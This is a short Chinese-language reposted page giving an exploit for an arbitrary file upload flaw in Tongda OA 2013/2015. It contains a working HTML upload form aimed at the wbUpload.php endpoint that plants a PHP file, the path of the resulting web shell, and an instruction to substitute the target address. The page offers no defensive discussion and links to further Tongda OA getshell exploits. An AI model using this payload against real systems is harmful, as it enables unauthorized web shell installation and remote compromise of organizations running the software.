碼上歡樂
相關內容    簡體    繁體

通達OA 任意文件上傳-2013/2015版本

本文轉載自   查看原文   2020-04-24 15:49   568    通達OA

參考

http://wiki.0-sec.org/0day/%E9%80%9A%E8%BE%BEoa/11.html

 

影響版本

2013版本

2015版本

 

漏洞文件

general/vmeet/wbUpload.php

 

exp     修改標記的為目標地址

<form enctype="multipart/form-data" action="http://0-sec.org/general/vmeet/wbUpload.php
?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>

上傳jpg之后shell地址為

http://0-sec.org/general/vmeet/wbUpload/test.php


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 通達OA 任意文件上傳+文件包含導致RCE 通達OA 文件上傳+任意文件包含 通達OA 頁面敏感信息-2013/2015版本 通達OA任意文件刪除/OA未授權訪問+任意文件上傳RCE漏洞復現 通達OA任意文件刪除/OA未授權訪問+任意文件上傳RCE漏洞復現 通達OA任意文件上傳+文件包含GetShell/包含日志文件Getshell 通達OA11.6任意文件刪除+文件上傳組合GetShell 通達OA任意文件上傳+文件包含RCE漏洞復現(附自寫EXP) 通達OA 任意文件上傳+文件包含導致RCE漏洞復現 最新通達OA11.6文件刪除+任意文件上傳rce漏洞復現
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM